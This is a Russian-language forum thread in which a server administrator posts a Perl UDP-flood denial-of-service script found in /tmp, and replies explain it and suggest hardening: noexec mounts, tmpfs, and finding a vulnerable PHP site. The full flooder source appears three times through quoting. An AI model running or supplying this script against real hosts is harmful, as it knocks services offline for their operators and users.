The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка  RSS
"Для чего этот скрипт может быть использован?"
Вариант для распечатки  
Пред. тема | След. тема 
Форумы OpenNET: Виртуальная конференция (Public)
Изначальное сообщение [Проследить за развитием треда]

"Для чего этот скрипт может быть использован?"  
Сообщение от gektor email(ok) on 24-Мрт-07, 14:12 
У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
Спецы перла, скажите для чего он используется?
Какие есть методы защиты от проникновения такого в папку тпм?

был запущен от пользователя apache с параметрами 88.158.99.2 80 0


Вот содержимое:

code:--------------------------------------------------------------------------------bash-3.00$ cat /tmp/udp.pl
#!/usr/bin/perl
###################################################
################ UDP ATACK FLOOD ##################
###################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf " \n";
printf "-------UDP ATACK FLOOD-------\n";
printf "EX: $0 <ip> <port> <time>\n";
printf "-----------------------------\n";
printf " \n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf " \n";
printf "-------UDP ATACK FLOOD-------\n";
printf "Seding flood: $ip:$port\n";
printf "-----------------------------\n";
printf " \n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
  --------------------------------------------------------------------------------

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

 Оглавление

Сообщения по теме [Сортировка по времени, UBB]


1. "Для чего этот скрипт может быть использован?"  
Сообщение от ncp email(??) on 24-Мрт-07, 15:07 
>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>Спецы перла, скажите для чего он используется?
>Какие есть методы защиты от проникновения такого в папку тпм?
>
>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
>
>
>Вот содержимое:
>
>code:--------------------------------------------------------------------------------bash-3.00$ cat /tmp/udp.pl
>#!/usr/bin/perl
>###################################################
>################ UDP ATACK FLOOD ##################
>###################################################
>
>use Socket;
>
>$ARGC=@ARGV;
>
>if ($ARGC !=3) {
> printf " \n";
> printf "-------UDP ATACK FLOOD-------\n";
> printf "EX: $0 <ip> <port> <time>\n";
> printf "-----------------------------\n";
> printf " \n";
> exit(1);
>}
>
>my ($ip,$port,$size,$time);
> $ip=$ARGV[0];
> $port=$ARGV[1];
> $time=$ARGV[2];
>
>socket(crazy, PF_INET, SOCK_DGRAM, 17);
>    $iaddr = inet_aton("$ip");
>
>printf " \n";
>printf "-------UDP ATACK FLOOD-------\n";
>printf "Seding flood: $ip:$port\n";
>printf "-----------------------------\n";
>printf " \n";
>
>if ($ARGV[1] ==0 && $ARGV[2] ==0) {
> goto randpackets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto packets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] ==0) {
> goto packets;
>}
>if ($ARGV[1] ==0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto randpackets;
>}
>
>packets:
>for (;;) {
> $size=$rand x $rand x $rand;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>}
>
>randpackets:
>for (;;) {
> $size=$rand x $rand x $rand;
> $port=int(rand 65000) +1;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>  --------------------------------------------------------------------------------


В програмировании ничего не понимаю, но скорее всего этот скрипт заставит товй сервер атаковать какой-ибо хост. Это судя по

> printf "-------UDP ATACK FLOOD-------\n";
> printf "EX: $0 <ip> <port> <time>\n";
> printf "-----------------------------\n";

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Для чего этот скрипт может быть использован?"  
Сообщение от cubatura email on 24-Мрт-07, 15:19 
>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>Спецы перла, скажите для чего он используется?
>Какие есть методы защиты от проникновения такого в папку тпм?
>
>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
>
>
>Вот содержимое:
>
>code:--------------------------------------------------------------------------------bash-3.00$ cat /tmp/udp.pl
>#!/usr/bin/perl
>###################################################
>################ UDP ATACK FLOOD ##################
>###################################################
>
>use Socket;
>
>$ARGC=@ARGV;
>
>if ($ARGC !=3) {
> printf " \n";
> printf "-------UDP ATACK FLOOD-------\n";
> printf "EX: $0 <ip> <port> <time>\n";
> printf "-----------------------------\n";
> printf " \n";
> exit(1);
>}
>
>my ($ip,$port,$size,$time);
> $ip=$ARGV[0];
> $port=$ARGV[1];
> $time=$ARGV[2];
>
>socket(crazy, PF_INET, SOCK_DGRAM, 17);
>    $iaddr = inet_aton("$ip");
>
>printf " \n";
>printf "-------UDP ATACK FLOOD-------\n";
>printf "Seding flood: $ip:$port\n";
>printf "-----------------------------\n";
>printf " \n";
>
>if ($ARGV[1] ==0 && $ARGV[2] ==0) {
> goto randpackets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto packets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] ==0) {
> goto packets;
>}
>if ($ARGV[1] ==0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto randpackets;
>}
>
>packets:
>for (;;) {
> $size=$rand x $rand x $rand;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>}
>
>randpackets:
>for (;;) {
> $size=$rand x $rand x $rand;
> $port=int(rand 65000) +1;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>  --------------------------------------------------------------------------------


бомбит пакетами размера $size,удаленный хост $ip

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

3. "Для чего этот скрипт может быть использован?"  
Сообщение от exn (ok) on 24-Мрт-07, 16:43 
Скрипт ниинтересный, /ам
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

4. "Для чего этот скрипт может быть использован?"  
Сообщение от nitalaut (ok) on 24-Мрт-07, 20:31 
>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>Спецы перла, скажите для чего он используется?
>Какие есть методы защиты от проникновения такого в папку тпм?
>
>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
Это довольно распространённый скрипт юдпфлуд - пытается завалить юдп пакетами удалённый хост - такой простенький DoS.
Теперь по устранению дырки:
1) Каталог /tmp доступен всем юзерам на чтение/запись и от этого никуда не денешься - специфика работы системы.
НО ты можешь(и должен) запретить ВЫПОЛНЕНИЕ программ в этом каталоге.
Для этого его надо смонтировать с определёнными опциями.
Подробнее в man mount.

2) Раз скрипт был запущен с правами апача значит и попал к тебе в систему он через дырку в апаче, а точнее вряд-ли в самом апаче, скорее всего дыра в каком-то сайте, который у тебя висит на апаче.
Очень вероятно, что это какой-то дырявый пхп скрипт.
Найти эту дыру будет не так легко.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

5. "Для чего этот скрипт может быть использован?"  
Сообщение от gektor email(ok) on 24-Мрт-07, 22:10 
>>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>>Спецы перла, скажите для чего он используется?
>>Какие есть методы защиты от проникновения такого в папку тпм?
>>
>>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
>Это довольно распространённый скрипт юдпфлуд - пытается завалить юдп пакетами удалённый хост
>- такой простенький DoS.
>Теперь по устранению дырки:
>1) Каталог /tmp доступен всем юзерам на чтение/запись и от этого никуда
>не денешься - специфика работы системы.
>НО ты можешь(и должен) запретить ВЫПОЛНЕНИЕ программ в этом каталоге.
>Для этого его надо смонтировать с определёнными опциями.
>Подробнее в man mount.
>
>2) Раз скрипт был запущен с правами апача значит и попал к
>тебе в систему он через дырку в апаче, а точнее вряд-ли
>в самом апаче, скорее всего дыра в каком-то сайте, который у
>тебя висит на апаче.
>Очень вероятно, что это какой-то дырявый пхп скрипт.
>Найти эту дыру будет не так легко.

Спасибо. Хоть один ценный овтет кто-то дал.. спасибо!
А можешь еще плз сказать с какими именно опциями? ман слишком большой, а я даже не знаю что именно искать там в мане :(

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

6. "Для чего этот скрипт может быть использован?"  
Сообщение от nitalaut (ok) on 25-Мрт-07, 10:25 
>А можешь еще плз сказать с какими именно опциями? ман слишком большой,
>а я даже не знаю что именно искать там в мане
>:(
все зависит от типа файловой системы
для ext3 это что-то вроде этого

/dev/md6        /tmp            ext3    nodev,nosuid,noexec    0       2

man очень удобно структурирован - он разбит на группы, каждая группа описывает опции для какой-то одной ФС. Прокрути его до своей ФС и читай...

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

7. "Для чего этот скрипт может быть использован?"  
Сообщение от n (??) on 25-Мрт-07, 14:48 
http://www.inf-sys.ru/ Официальный сайт компании Информ-Системы. Кому интересно оставляйте свои сообщения на форуме!
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

8. "Для чего этот скрипт может быть использован?"  
Сообщение от gektor email(ok) on 25-Мрт-07, 15:58 
>>А можешь еще плз сказать с какими именно опциями? ман слишком большой,
>>а я даже не знаю что именно искать там в мане
>>:(
>все зависит от типа файловой системы
>для ext3 это что-то вроде этого
>
>/dev/md6        /tmp    
>        ext3  
> nodev,nosuid,noexec    0      
> 2
>
>man очень удобно структурирован - он разбит на группы, каждая группа описывает
>опции для какой-то одной ФС. Прокрути его до своей ФС и
>читай...

Оказалось что у меня при установке системы /tmp не отдельно был смонтирован, так что тут не прокатывает... :(

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

9. "Для чего этот скрипт может быть использован?"  
Сообщение от gektor email(ok) on 25-Мрт-07, 15:59 
как мне прошить апач, который ставился с FC4 по умолчанию? yum update?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

10. "Для чего этот скрипт может быть использован?"  
Сообщение от nimb (ok) on 27-Мрт-07, 15:32 
используйте tmpfs
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

11. "Для чего этот скрипт может быть использован?"  
Сообщение от gektor email(ok) on 28-Мрт-07, 15:15 
>используйте tmpfs


Можешь поподробнее? что эт такое и с чем это едят?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]




Спонсоры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2022 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру